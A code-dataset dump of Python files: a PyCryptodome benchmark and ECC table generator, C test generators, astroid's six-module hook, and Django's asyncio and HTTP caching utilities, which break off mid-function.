for b in blocks:
hashes.append(hash_constructor(b))
# Make some signatures
signatures = []
for h in hashes:
signatures.append(sigscheme.sign(h))
# Double the list, to make timing better
hashes = hashes + hashes
signatures = signatures + signatures
# Perform verification
t0 = time.time()
for h, s in zip(hashes, signatures):
sigscheme.verify(h, s)
t = time.time()
speed = len(hashes) / (t - t0)
self.announce_result(speed, "sigs/sec")
def generate_cipher(self, module, key_size, params):
params_dict = {}
if params:
params_dict = dict([x.split("=") for x in params.split(" ")])
gen_tuple = []
gen_dict = {}
# 1st parameter (mandatory): key
if params_dict.get('ks') == "x2":
key = rng(2 * key_size)
else:
key = rng(key_size)
gen_tuple.append(key)
# 2nd parameter: mode
mode = params_dict.get("mode")
if mode:
mode_value = getattr(module, mode, None)
if mode_value is None:
# Mode not available for this cipher
raise ModeNotAvailable()
gen_tuple.append(getattr(module, mode))
# 3rd parameter: IV/nonce
iv_length = params_dict.get("iv")
if iv_length is None:
iv_length = params_dict.get("nonce")
if iv_length:
if iv_length == "bs":
iv_length = module.block_size
iv = rng(int(iv_length))
gen_tuple.append(iv)
# Specific to CTR mode
le = params_dict.get("little_endian")
if le:
if le == "True":
le = True
else:
le = False
# Remove iv from parameters
gen_tuple = gen_tuple[:-1]
ctr = Crypto.Util.Counter.new(module.block_size*8,
initial_value=bytes_to_long(iv),
little_endian=le,
allow_wraparound=True)
gen_dict['counter'] = ctr
# Generate cipher
return module.new(*gen_tuple, **gen_dict)
def run(self):
pubkey_specs = [
("RSA(1024)", RSA, int(1024/8)),
("RSA(2048)", RSA, int(2048/8)),
("RSA(4096)", RSA, int(4096/8)),
]
block_cipher_modes = [
# Mode name, key setup, parameters
("CBC", True, "mode=MODE_CBC iv=bs"),
("CFB-8", False, "mode=MODE_CFB iv=bs"),
("OFB", False, "mode=MODE_OFB iv=bs"),
("ECB", False, "mode=MODE_ECB"),
("CTR-LE", True, "mode=MODE_CTR iv=bs little_endian=True"),
("CTR-BE", False, "mode=MODE_CTR iv=bs little_endian=False"),
("OPENPGP", False, "mode=MODE_OPENPGP iv=bs"),
("CCM", True, "mode=MODE_CCM nonce=12"),
("GCM", True, "mode=MODE_GCM nonce=16"),
("EAX", True, "mode=MODE_EAX nonce=16"),
("SIV", True, "mode=MODE_SIV ks=x2 nonce=16"),
("OCB", True, "mode=MODE_OCB nonce=15"),
]
block_specs = [
# Cipher name, module, key size
("DES", DES, 8),
("DES3", DES3, 24),
("AES128", AES, 16),
("AES192", AES, 24),
("AES256", AES, 32),
("Blowfish(256)", Blowfish, 32),
("CAST(128)", CAST, 16),
("ARC2(128)", ARC2, 16),
]
stream_specs = [
# Cipher name, module, key size, nonce size
("ARC4(128)", ARC4, 16, 0),
("Salsa20(16)", Salsa20, 16, 8),
("Salsa20(32)", Salsa20, 32, 8),
("ChaCha20", ChaCha20_old_style, 32, 8),
]
hash_specs = [
("MD2", MD2),
("MD4", MD4),
("MD5", MD5),
("SHA1", SHA1),
("SHA224", SHA224),
("SHA256", SHA256),
("SHA384", SHA384),
("SHA512", SHA512),
("SHA3_224", SHA3_224),
("SHA3_256", SHA3_256),
("SHA3_384", SHA3_384),
("SHA3_512", SHA3_512),
("BLAKE2b", BLAKE2b_512),
("BLAKE2s", BLAKE2s_256),
]
if RIPEMD160 is not None:
hash_specs += [("RIPEMD160", RIPEMD160)]
hashlib_specs = []
if hashlib is not None:
if hasattr(hashlib, 'md5'): hashlib_specs.append(("hashlib.md5", hashlib.md5))
if hasattr(hashlib, 'sha1'): hashlib_specs.append(("hashlib.sha1", hashlib.sha1))
if hasattr(hashlib, 'sha224'): hashlib_specs.append(("hashlib.sha224", hashlib.sha224))
if hasattr(hashlib, 'sha256'): hashlib_specs.append(("hashlib.sha256", hashlib.sha256))
if hasattr(hashlib, 'sha384'): hashlib_specs.append(("hashlib.sha384", hashlib.sha384))
if hasattr(hashlib, 'sha512'): hashlib_specs.append(("hashlib.sha512", hashlib.sha512))
# stdlib random
self.test_random_module("stdlib random", stdlib_random)
# Crypto.Random.random
self.test_random_module("Crypto.Random.random", pycrypto_random)
# Crypto.PublicKey
for pubkey_name, module, key_bytes in pubkey_specs:
self.test_pubkey_setup(pubkey_name, module, key_bytes)
# Crypto.Cipher (block ciphers)
for cipher_name, module, key_bytes in block_specs:
# Benchmark each cipher in each of the various modes (CBC, etc)
for mode_name, test_ks, params in block_cipher_modes:
mode_text = "%s-%s" % (cipher_name, mode_name)
try:
if test_ks:
self.test_key_setup(mode_text, module, key_bytes, params)
self.test_encryption(mode_text, module, key_bytes, params)
except ModeNotAvailable as e:
pass
# Crypto.Cipher (stream ciphers)
for cipher_name, module, key_bytes, nonce_bytes in stream_specs:
params = ""
if nonce_bytes:
params = "nonce=" + str(nonce_bytes)
self.test_key_setup(cipher_name, module, key_bytes, params)
self.test_encryption(cipher_name, module, key_bytes, params)
# Crypto.Hash
for hash_name, module in hash_specs:
self.test_hash_small(hash_name, module.new, module.digest_size)
self.test_hash_large(hash_name, module.new, module.digest_size)
# standard hashlib
for hash_name, func in hashlib_specs:
self.test_hash_small(hash_name, func, func().digest_size)
self.test_hash_large(hash_name, func, func().digest_size)
# PyCrypto HMAC
for hash_name, module in hash_specs:
if not hasattr(module, "block_size"):
continue
self.test_hmac_small("HMAC-"+hash_name, HMAC.new, module, module.digest_size)
self.test_hmac_large("HMAC-"+hash_name, HMAC.new, module, module.digest_size)
# standard hmac + hashlib
for hash_name, func in hashlib_specs:
if not hasattr(module, "block_size"):
continue
self.test_hmac_small("hmac+"+hash_name, hmac.HMAC, func, func().digest_size)
self.test_hmac_large("hmac+"+hash_name, hmac.HMAC, func, func().digest_size)
# CMAC
for cipher_name, module, key_size in (("AES128", AES, 16),):
self.test_cmac_small(cipher_name+"-CMAC", CMAC.new, module, key_size)
self.test_cmac_large(cipher_name+"-CMAC", CMAC.new, module, key_size)
# PKCS1_v1_5 (sign) + Crypto.Hash
for hash_name, module in hash_specs:
self.test_pkcs1_sign("PKCS#1-v1.5", RSASSA_PKCS1_v1_5.new, hash_name, module.new, module.digest_size)
# PKCS1_PSS (sign) + Crypto.Hash
for hash_name, module in hash_specs:
self.test_pkcs1_sign("PKCS#1-PSS", PKCS1_PSS.new, hash_name, module.new, module.digest_size)
# PKCS1_v1_5 (verify) + Crypto.Hash
for hash_name, module in hash_specs:
self.test_pkcs1_verify("PKCS#1-v1.5", RSASSA_PKCS1_v1_5.new, hash_name, module.new, module.digest_size)
# PKCS1_PSS (verify) + Crypto.Hash
for hash_name, module in hash_specs:
self.test_pkcs1_verify("PKCS#1-PSS", PKCS1_PSS.new, hash_name, module.new, module.digest_size)
if __name__ == '__main__':
Benchmark().run()
# vim:set ts=4 sw=4 sts=4 expandtab:
```
#### File: pycryptodome/src/make_ecc_table.py
```python
import argparse
declaration = """\
/* This file was automatically generated, do not edit */
#include "common.h"
extern const unsigned {0}_n_tables;
extern const unsigned {0}_window_size;
extern const unsigned {0}_points_per_table;
extern const uint64_t {0}_tables[{1}][{2}][2][{3}];
"""
definition = """\
/* This file was automatically generated, do not edit */
#include "common.h"
const unsigned {0}_n_tables = {1};
const unsigned {0}_window_size = {2};
const unsigned {0}_points_per_table = {3};
/* {4} */
/* Table size: {5} kbytes */
const uint64_t {0}_tables[{1}][{3}][2][{6}] = {{\
"""
point = """\
{{ /* Point #{0} */
{{ {1} }},
{{ {2} }}
}}{3}\
"""
parser = argparse.ArgumentParser()
parser.add_argument("curve")
parser.add_argument("window_size", type=int)
parser.add_argument("basename")
args = parser.parse_args()
if args.curve == "p256":
bits = 256
p = 0xffffffff00000001000000000000000000000000ffffffffffffffffffffffff
Gx = 0x6b17d1f2e12c4247f8bce6e563a440f277037d812deb33a0f4a13945d898c296
Gy = 0x4fe342e2fe1a7f9b8ee7eb4a7c0f9e162bce33576b315ececbb6406837bf51f5
msg = "Affine coordinates in Montgomery form"
elif args.curve == "p384":
bits = 384
p = 0xfffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffeffffffff0000000000000000ffffffff
Gx = 0xaa87ca22be8b05378eb1c71ef320ad746e1d3b628ba79b9859f741e082542a385502f25dbf55296c3a545e3872760aB7
Gy = 0x3617de4a96262c6f5d9e98bf9292dc29f8f41dbd289a147ce9da3113b5f0b8c00a60b1ce1d7e819d7a431d7c90ea0e5F
msg = "Affine coordinates in Montgomery form"
elif args.curve == "p521":
bits = 521
p = 0x000001ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
Gx = 0x000000c6858e06b70404e9cd9e3ecb662395b4429c648139053fb521f828af606b4d3dbaa14b5e77efe75928fe1dc127a2ffa8de3348b3c1856a429bf97e7e31c2e5bd66
Gy = 0x0000011839296a789a3bc0045c8a5fb42c7d1bd998f54449579b446817afbd17273e662c97ee72995ef42640c550b9013fad0761353c7086a272c24088be94769fd16650
msg = "Affine coordinates in plain form (not Montgomery)"
else:
raise ValueError("Unsupported curve: " + args.curve)
c_file = open(args.basename + ".c", "wt")
h_file = open(args.basename + ".h", "wt")
words = (bits + 63) // 64
window_size = args.window_size
points_per_table = 2**window_size
n_tables = (bits + window_size - 1) // window_size
byte_size = n_tables * points_per_table * 2 * (bits // 64) * (64 // 8) // 1024
G = Gx, Gy
def double(X1, Y1):
if X1 == 0 and Y1 == 0:
return (0, 0)
XX = pow(X1, 2, p)
w = -3 + 3 * XX
Y1Y1 = pow(Y1, 2, p)
R = 2 * Y1Y1
sss = 4 * Y1 * R
RR = pow(R, 2, p)
B = pow(X1 + R, 2, p) - XX - RR
h = pow(w, 2, p) - 2 * B
X3 = 2 * h * Y1 % p
Y3 = w * (B - h) - 2 * RR % p
Z3 = sss
Z3inv = pow(Z3, p - 2, p)
x3 = X3 * Z3inv % p
y3 = Y3 * Z3inv % p
return (x3, y3)
def add(X1, Y1, X2, Y2):
if X1 == 0 and Y1 == 0:
return (X2, Y2)
if X1 == X2 and Y1 == Y2:
return double(X1, Y1)
if X1 == X2 and (Y1 + Y2) % p == 0:
return (0, 0)
u = Y2 - Y1
uu = pow(u, 2, p)
v = X2 - X1
vv = pow(v, 2, p)
vvv = v * vv % p
R = vv * X1 % p
A = uu - vvv - 2 * R
X3 = v * A % p
Y3 = (u * (R - A) - vvv * Y1) % p
Z3 = vvv
Z3inv = pow(Z3, p - 2, p)
x3 = X3 * Z3inv % p
y3 = Y3 * Z3inv % p
return (x3, y3)
def get64(z, words):
"""Return a C string with the number encoded into 64-bit words"""
# Convert to Montgomery form, but only if it's not P521
if words != 9:
R = 2**(words * 64)
x = z * R % p
else:
x = z
result = []
for _ in range(words):
masked = x & ((1 << 64) - 1)
result.append("0x%016XULL" % masked)
x >>= 64
return ",".join(result)
# Create table with points 0, G, 2G, 3G, .. (2**window_size-1)G
window = [(0, 0)]
for _ in range(points_per_table - 1):
new_point = add(*window[-1], *G)
window.append(new_point)
print(declaration.format(args.curve, n_tables, points_per_table, words), file=h_file)
print(definition.format(args.curve, n_tables, window_size, points_per_table, msg,
byte_size, words), file=c_file)
for i in range(n_tables):
print(" { /* Table #%u */" % i, file=c_file)
for j, w in enumerate(window):
endc = "" if (j == points_per_table - 1) else ","
print(point.format(j, get64(w[0], words), get64(w[1], words), endc),
file=c_file)
endc = "" if (i == n_tables - 1) else ","
print(" }%s" % endc, file=c_file)
# Move from G to G*2^{w}
for j in range(window_size):
G = double(*G)
# Update window
for j in range(1, points_per_table):
window[j] = add(*window[j-1], *G)
print("};", file=c_file)
```
#### File: src/test/make_tests_addmul.py
```python
from common import counter, make_main, split64
def make_test(t, a, k):
if k == -1:
k = 0xFFFFFFFFFFFFFFFF
assert(0 <= k < 0x10000000000000000)
# What we expect the function to compute
result = t + a*k
# Turn a[] and t[] into arrays of 64-bit words
a = split64(a)
t_in = split64(t)
result = split64(result)
# Computation does not depend on zero terms
result_len = max(len(result), 1 + len(a))
# Pad the output vector with as many padding zeroes as needed
for x in xrange(result_len - len(t_in)):
t_in.append("0")
for x in xrange(result_len - len(result)):
result.append("0")
test_nr = counter.next()
print ""
print "void test_%d() {" % test_nr
#print ' printf("Test #%d\\n");' % test_nr
print " const uint64_t a[] = {" + ", ".join(a) + "};"
print " uint64_t t[] = {" + ", ".join(t_in) + ", 0xAAAAAAAAAAAAAAAAULL};"
print " const uint64_t expected_t[] = {" + ", ".join(result) + "};"
print ""
print " addmul(t, %d, a, %d, 0x%x);" % (result_len, len(a), k)
print " assert(memcmp(t, expected_t, 8*%d) == 0);" % result_len
print " assert(t[%d] == 0xAAAAAAAAAAAAAAAAULL);" % result_len
print "}"
print ""
print "#include <assert.h>"
print "#include <string.h>"
print "#include <stdint.h>"
print "#include <stdio.h>"
print ""
print "void addmul(uint64_t *t, size_t tw, const uint64_t *a, size_t aw, uint64_t k);"
make_test(0, 0, 0)
make_test(0, 1, 1)
make_test(0, 5, 5)
make_test(0, 0xFFFFFFFFFFFFFFFFFFF, -1)
make_test(0xFFFFFFFFFFFFFFFF, 1, 1)
make_test(32783243204234329232323, 9232922323, 39393938)
make_test(32783243204234329232323333333333333783839393,
92329223233877777777777777777777777838333, 0x1000000)
make_test(37893272389423987423987429837498237498237498274982374982734982374982734982743982374,
30309093333334930430493049304930940394039430303000009090909093434930493094039409340930493094309403940394039403940394039403940390493049304943,
0x1000000)
make_main()
```
#### File: src/test/make_tests_product.py
```python
from common import counter, make_main, split64
def make_test(a, b):
# Turn a[], b[] and the result into arrays of 64-bit words
result = split64(a*b)
a = split64(a)
b = split64(b)
# Pad the output vector with as many padding zeroes as needed
# Computation does not depend on zero terms
for _ in xrange(max(len(b), len(a)) - len(b)):
b.append("0")
for _ in xrange(max(len(b), len(a)) - len(a)):
a.append("0")
result_len = len(b) + len(a)
for _ in xrange(result_len - len(result)):
result.append("0")
# Fill output buffer with values that must be overwritten
t = [ "0xCCCCCCCCCCCCCCCCULL" ] * result_len
print ""
print "void test_%d() {" % counter.next()
print " const uint64_t a[] = {" + ", ".join(a) + "};"
print " const uint64_t b[] = {" + ", ".join(b) + "};"
print " uint64_t t[] = {" + ", ".join(t) + ", 0xAAAAAAAAAAAAAAAAULL};"
print " uint64_t scratchpad[%d];" % (3*len(a))
print " const uint64_t expected_t[] = {" + ", ".join(result) + "};"
print ""
print " product(t, scratchpad, a, b, %d);" % len(a)
print " assert(memcmp(t, expected_t, 8*%d) == 0);" % result_len
#print ' printf("t[{0}]=0x%016lX\\n", t[{0}]);'.format(result_len)
print " assert(t[%d] == 0xAAAAAAAAAAAAAAAAULL);" % result_len
print "}"
print ""
print "#include <assert.h>"
print "#include <string.h>"
print "#include <stdint.h>"
print "#include <stdio.h>"
print ""
print "void product(uint64_t *t, uint64_t *product, const uint64_t *a, const uint64_t *b, size_t words);"
make_test(0, 0)
make_test(1, 0)
make_test(27, 98)
make_test(27832782374324, 78237487324872348723847234)
make_test(0x786BF, 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF)
make_test(0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF,
0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF)
make_main()
```
|
{
"source": "jestinmwilson/personal-website",
"score": 2
}
|
#### File: astroid/brain/brain_six.py
```python
"""Astroid hooks for six module."""
from textwrap import dedent
from astroid import MANAGER, register_module_extender
from astroid.builder import AstroidBuilder
from astroid.exceptions import (
AstroidBuildingError,
InferenceError,
AttributeInferenceError,
)
from astroid import nodes
SIX_ADD_METACLASS = "six.add_metaclass"
def _indent(text, prefix, predicate=None):
"""Adds 'prefix' to the beginning of selected lines in 'text'.
If 'predicate' is provided, 'prefix' will only be added to the lines
where 'predicate(line)' is True. If 'predicate' is not provided,
it will default to adding 'prefix' to all non-empty lines that do not
consist solely of whitespace characters.
"""
if predicate is None:
predicate = lambda line: line.strip()
def prefixed_lines():
for line in text.splitlines(True):
yield prefix + line if predicate(line) else line
return "".join(prefixed_lines())
_IMPORTS = """
import _io
cStringIO = _io.StringIO
filter = filter
from itertools import filterfalse
input = input
from sys import intern
map = map
range = range
from importlib import reload
reload_module = lambda module: reload(module)
from functools import reduce
from shlex import quote as shlex_quote
from io import StringIO
from collections import UserDict, UserList, UserString
xrange = range
zip = zip
from itertools import zip_longest
import builtins
import configparser
import copyreg
import _dummy_thread
import http.cookiejar as http_cookiejar
import http.cookies as http_cookies
import html.entities as html_entities
import html.parser as html_parser
import http.client as http_client
import http.server as http_server
BaseHTTPServer = CGIHTTPServer = SimpleHTTPServer = http.server
import pickle as cPickle
import queue
import reprlib
import socketserver
import _thread
import winreg
import xmlrpc.server as xmlrpc_server
import xmlrpc.client as xmlrpc_client
import urllib.robotparser as urllib_robotparser
import email.mime.multipart as email_mime_multipart
import email.mime.nonmultipart as email_mime_nonmultipart
import email.mime.text as email_mime_text
import email.mime.base as email_mime_base
import urllib.parse as urllib_parse
import urllib.error as urllib_error
import tkinter
import tkinter.dialog as tkinter_dialog
import tkinter.filedialog as tkinter_filedialog
import tkinter.scrolledtext as tkinter_scrolledtext
import tkinter.simpledialog as tkinder_simpledialog
import tkinter.tix as tkinter_tix
import tkinter.ttk as tkinter_ttk
import tkinter.constants as tkinter_constants
import tkinter.dnd as tkinter_dnd
import tkinter.colorchooser as tkinter_colorchooser
import tkinter.commondialog as tkinter_commondialog
import tkinter.filedialog as tkinter_tkfiledialog
import tkinter.font as tkinter_font
import tkinter.messagebox as tkinter_messagebox
import urllib
import urllib.request as urllib_request
import urllib.robotparser as urllib_robotparser
import urllib.parse as urllib_parse
import urllib.error as urllib_error
"""
def six_moves_transform():
code = dedent(
"""
class Moves(object):
{}
moves = Moves()
"""
).format(_indent(_IMPORTS, " "))
module = AstroidBuilder(MANAGER).string_build(code)
module.name = "six.moves"
return module
def _six_fail_hook(modname):
"""Fix six.moves imports due to the dynamic nature of this
class.
Construct a pseudo-module which contains all the necessary imports
for six
:param modname: Name of failed module
:type modname: str
:return: An astroid module
:rtype: nodes.Module
"""
attribute_of = modname != "six.moves" and modname.startswith("six.moves")
if modname != "six.moves" and not attribute_of:
raise AstroidBuildingError(modname=modname)
module = AstroidBuilder(MANAGER).string_build(_IMPORTS)
module.name = "six.moves"
if attribute_of:
# Facilitate import of submodules in Moves
start_index = len(module.name)
attribute = modname[start_index:].lstrip(".").replace(".", "_")
try:
import_attr = module.getattr(attribute)[0]
except AttributeInferenceError:
raise AstroidBuildingError(modname=modname)
if isinstance(import_attr, nodes.Import):
submodule = MANAGER.ast_from_module_name(import_attr.names[0][0])
return submodule
# Let dummy submodule imports pass through
# This will cause an Uninferable result, which is okay
return module
def _looks_like_decorated_with_six_add_metaclass(node):
if not node.decorators:
return False
for decorator in node.decorators.nodes:
if not isinstance(decorator, nodes.Call):
continue
if decorator.func.as_string() == SIX_ADD_METACLASS:
return True
return False
def transform_six_add_metaclass(node):
"""Check if the given class node is decorated with *six.add_metaclass*
If so, inject its argument as the metaclass of the underlying class.
"""
if not node.decorators:
return
for decorator in node.decorators.nodes:
if not isinstance(decorator, nodes.Call):
continue
try:
func = next(decorator.func.infer())
except InferenceError:
continue
if func.qname() == SIX_ADD_METACLASS and decorator.args:
metaclass = decorator.args[0]
node._metaclass = metaclass
return node
register_module_extender(MANAGER, "six", six_moves_transform)
register_module_extender(
MANAGER, "requests.packages.urllib3.packages.six", six_moves_transform
)
MANAGER.register_failed_import_hook(_six_fail_hook)
MANAGER.register_transform(
nodes.ClassDef,
transform_six_add_metaclass,
_looks_like_decorated_with_six_add_metaclass,
)
```
#### File: django/utils/asyncio.py
```python
import asyncio
import functools
import os
from django.core.exceptions import SynchronousOnlyOperation
def async_unsafe(message):
"""
Decorator to mark functions as async-unsafe. Someone trying to access
the function while in an async context will get an error message.
"""
def decorator(func):
@functools.wraps(func)
def inner(*args, **kwargs):
if not os.environ.get('DJANGO_ALLOW_ASYNC_UNSAFE'):
# Detect a running event loop in this thread.
try:
event_loop = asyncio.get_event_loop()
except RuntimeError:
pass
else:
if event_loop.is_running():
raise SynchronousOnlyOperation(message)
# Pass onwards.
return func(*args, **kwargs)
return inner
# If the message is actually a function, then be a no-arguments decorator.
if callable(message):
func = message
message = 'You cannot call this from an async context - use a thread or sync_to_async.'
return decorator(func)
else:
return decorator
```
#### File: django/utils/cache.py
```python
import hashlib
import re
import time
from django.conf import settings
from django.core.cache import caches
from django.http import HttpResponse, HttpResponseNotModified
from django.utils.encoding import iri_to_uri
from django.utils.http import (
http_date, parse_etags, parse_http_date_safe, quote_etag,
)
from django.utils.log import log_response
from django.utils.timezone import get_current_timezone_name
from django.utils.translation import get_language
cc_delim_re = re.compile(r'\s*,\s*')
def patch_cache_control(response, **kwargs):
"""
Patch the Cache-Control header by adding all keyword arguments to it.
The transformation is as follows:
* All keyword parameter names are turned to lowercase, and underscores
are converted to hyphens.
* If the value of a parameter is True (exactly True, not just a
true value), only the parameter name is added to the header.
* All other parameters are added with their value, after applying
str() to it.
"""
def dictitem(s):
t = s.split('=', 1)
if len(t) > 1:
return (t[0].lower(), t[1])
else:
return (t[0].lower(), True)
def dictvalue(t):
if t[1] is True:
return t[0]
else:
return '%s=%s' % (t[0], t[1])
if response.get('Cache-Control'):
cc = cc_delim_re.split(response['Cache-Control'])
cc = dict(dictitem(el) for el in cc)
else:
cc = {}
# If there's already a max-age header but we're being asked to set a new
# max-age, use the minimum of the two ages. In practice this happens when
# a decorator and a piece of middleware both operate on a given view.
if 'max-age' in cc and 'max_age' in kwargs:
kwargs['max_age'] = min(int(cc['max-age']), kwargs['max_age'])
# Allow overriding private caching and vice versa
if 'private' in cc and 'public' in kwargs:
del cc['private']
elif 'public' in cc and 'private' in kwargs:
del cc['public']
for (k, v) in kwargs.items():
cc[k.replace('_', '-')] = v
cc = ', '.join(dictvalue(el) for el in cc.items())
response['Cache-Control'] = cc
def get_max_age(response):
"""
Return the max-age from the response Cache-Control header as an integer,
or None if it wasn't found or wasn't an integer.
"""
if not response.has_header('Cache-Control'):
return
cc = dict(_to_tuple(el) for el in cc_delim_re.split(response['Cache-Control']))
try:
return int(cc['max-age'])
except (ValueError, TypeError, KeyError):
pass
def set_response_etag(response):
if not response.streaming:
response['ETag'] = quote_etag(hashlib.md5(response.content).hexdigest())
return response
def _precondition_failed(request):
response = HttpResponse(status=412)
log_response(
'Precondition Failed: %s', request.path,
response=response,
request=request,
)
return response
def _not_modified(request, response=None):
new_response = HttpResponseNotModified()
if response:
# Preserve the headers required by Section 4.1 of RFC 7232, as well as
# Last-Modified.
for header in ('Cache-Control', 'Content-Location', 'Date', 'ETag', 'Expires', 'Last-Modified', 'Vary'):
if header in response:
new_response[header] = response[header]
# Preserve cookies as per the cookie specification: "If a proxy server
# receives a response which contains a Set-cookie header, it should
# propagate the Set-cookie header to the client, regardless of whether
# the response was 304 (Not Modified) or 200 (OK).
# https://curl.haxx.se/rfc/cookie_spec.html
new_response.cookies = response.cookies
return new_response
def get_conditional_response(request, etag=None, last_modified=None, response=None):
# Only return conditional responses on successful requests.
if response and not (200 <= response.status_code < 300):
return response
# Get HTTP request headers.
if_match_etags = parse_etags(request.META.get('HTTP_IF_MATCH', ''))
if_unmodified_since = request.META.get('HTTP_IF_UNMODIFIED_SINCE')
if_unmodified_since = if_unmodified_since and parse_http_date_safe(if_unmodified_since)
if_none_match_etags = parse_etags(request.META.get('HTTP_IF_NONE_MATCH', ''))
if_modified_since = request.META.get('HTTP_IF_MODIFIED_SINCE')
if_modified_since = if_modified_since and parse_http_date_safe(if_modified_since)
# Step 1 of section 6 of RFC 7232: Test the If-Match precondition.
if if_match_etags and not _if_match_passes(etag, if_match_etags):
return _precondition_failed(request)
# Step 2: Test the If-Unmodified-Since precondition.
if (not if_match_etags and if_unmodified_since and
not _if_unmodified_since_passes(last_modified, if_unmodified_since)):
return _precondition_failed(request)
# Step 3: Test the If-None-Match precondition.
if if_none_match_etags and not _if_none_match_passes(etag, if_none_match_etags):
if request.method in ('GET', 'HEAD'):
return _not_modified(request, response)
else:
return _precondition_failed(request)
# Step 4: Test the If-Modified-Since precondition.
if (not if_none_match_etags and if_modified_since and
not _if_modified_since_passes(last_modified, if_modified_since)):
if request.method in ('GET', 'HEAD'):
return _not_modified(request, response)
# Step 5: Test the If-Range precondition (not supported).
# Step 6: Return original response since there isn't a conditional response.
return response
def _if_match_passes(target_etag, etags):
"""
Test the If-Match comparison as defined in section 3.1 of RFC 7232.
"""
if not target_etag:
# If there isn't an ETag, then there can't be a match.
return False
elif etags == ['*']:
# The existence of an ETag means that there is "a current
# representation for the target resource", even if the ETag is weak,
# so there is a match to '*'.
return True
elif target_etag.startswith('W/'):
# A weak ETag can never strongly match another ETag.
return False
else:
# Since the ETag is strong, this will only return True if there's a
# strong match.
return target_etag in etags
def _if_unmodified_since_passes(last_modified, if_unmodified_since):
"""
Test the If-Unmodified-Since comparison as defined in section 3.4 of
RFC 7232.
"""
return last_modified and last_modified <= if_unmodified_since
def _if_none_match_passes(target_etag, etags):
"""
Test the If-None-Match comparison as defined in section 3.2 of RFC 7232.
"""
if not target_etag:
# If there isn't an ETag, then there isn't a match.
return True
elif etags == ['*']:
# The existence of an ETag means that there is "a current
# representation for the target resource", so there is a match to '*'.
return False
else:
# The comparison should be weak, so look for a match after stripping
# off any weak indicators.
target_etag = target_etag.strip('W/')
etags = (etag.strip('W/') for etag in etags)
return target_etag not in etags
def _if_modified_since_passes(last_modified, if_modified_since):
"""
Test the If-Modified-Since comparison as defined in section 3.3 of RFC 7232.
"""
return not last_modified or last_modified > if_modified_since
def patch_response_headers(response, cache_timeout=None):
"""
Add HTTP caching headers to the given HttpResponse: Expires and
Cache-Control.
Each header is only added if it isn't already set.
cache_timeout is in seconds. The CACHE_MIDDLEWARE_SECONDS setting is used
by default.
"""
if cache_timeout is None:
cache_timeout = settings.CACHE_MIDDLEWARE_SECONDS
if cache_timeout < 0:
cache_timeout = 0 # Can't have max-age negative
if not response.has_header('Expires'):
response['Expires'] = http_date(time.time() + cache_timeout)
patch_cache_control(response, max_age=cache_timeout)
def add_never_cache_headers(response):
"""
Add headers to a response to indicate that a page should never be cached.
"""
patch_response_headers(response, cache_timeout=-1)
patch_cache_control(response, no_cache=True, no_store=True, must_revalidate=True, private=True)
def patch_vary_headers(response, newheaders):
"""
Add (or update) the "Vary" header in the given HttpResponse object.
newheaders is a list of header names that should be in "Vary". If headers
contains an asterisk, then "Vary" header will consist of a single asterisk
'*'. Otherwise, existing headers in "Vary" aren't removed.
"""
# Note that we need to keep the original order intact, because cache
# implementations may rely on the order of the Vary contents in, say,
# computing an MD5 hash.
if response.has_header('Vary'):
vary_headers = cc_delim_re.split(response['Vary'])
else:
vary_headers = []
# Use .lower() here so we treat headers as case-insensitive.
existing_headers = {header.lower() for header in vary_headers}
additional_headers = [newheader for newheader in newheaders
if newheader.lower() not in existing_headers]
vary_headers += additional_headers
if '*' in vary_headers:
response['Vary'] = '*'
else:
response['Vary'] = ', '.join(vary_headers)
def has_vary_header(response, header_query):
"""
Check to see if the response has a given header name in its Vary header.
"""
if not response.has_header('Vary'):
return False
vary_headers = cc_delim_re.split(response['Vary'])
existing_headers = {header.lower() for header in vary_headers}
return header_query.lower() in existing_headers
def _i18n_cache_key_suffix(request, cache_key):
"""If necessary, add the current locale or time zone to the cache key."""
if settings.USE_I18N or settings.USE_L10N:
# first check if LocaleMiddleware or another middleware added
# LANGUAGE_CODE to request, then fall back to the active language
# which in turn can also fall back to settings.LANGUAGE_CODE
cache_key += '.%s' % getattr(request, 'LANGUAGE_CODE', get_language())
if settings.USE_TZ:
cache_key += '.%s' % get_current_timezone_name()
return cache_key
def _generate_cache_key(request, method, headerlist, key_prefix):
"""Return a cache key from the headers given in the header list."""
ctx = hashlib.md5()
for header in headerlist:
value = request.META.get(header)
if value is not None:
ctx.update(value.encode())
url = hashlib.md5(iri_to_uri(request.build_absolute_uri()).encode('ascii'))
cache_key = 'views.decorators.cache.cache_page.%s.%s.%s.%s' % (
key_prefix, method, url.hexdigest(), ctx.hexdigest())
return _i18n_cache_key_suffix(request, cache_key)
def _generate_cache_header_key(key_prefix, request):
"""Return a cache key for the header cache."""
url = hashlib.md5(iri_to_uri(request.build_absolute_uri()).encode('ascii'))
cache_key = 'views.decorators.cache.cache_header.%s.%s' % (
key_prefix, url.hexdigest())
return _i18n_cache_key_suffix(request, cache_key)
def get_cache_key(request, key_prefix=None, method='GET', cache=None):
"""
Return a cache key based on the request URL and query. It can be used
in the request phase because it pulls the list of headers to take into
account from the global URL registry and uses those to build a cache key
to check against.
If there isn't a headerlist stored, return None, indicating that the page
needs to be rebuilt.
"""
if key_prefix is None:
key_prefix = settings.CACHE_MIDDLEWARE_KEY_PREFIX
cache_key = _generate_cache_header_key(key_prefix, request)
if cache is None:
cache = caches[settings.CACHE_MIDDLEWARE_ALIAS]
headerlist = cache.get(cache_key)
if headerlist is not None:
return _generate_cache_key(request, method, headerlist, key_prefix)
else:
return None
def learn_cache_key(request, response, cache_timeout=None, key_prefix=None, cache=None):
"""
Learn what headers to take into account for some request URL from the
response object. Store those headers in a global URL registry so that
later access to that URL will know what headers to take into account
without building the response object itself. The headers are named in the
Vary header of the response, but we want to prevent response generation.
The list of headers to use for cache key generation is stored in the same
cache as the pages themselves. If the cache ages some data out of the
cache, this just means that we have to build the response once to get at
the Vary header and so at the list of headers to use for the cache key.
"""
if key_prefix is None:
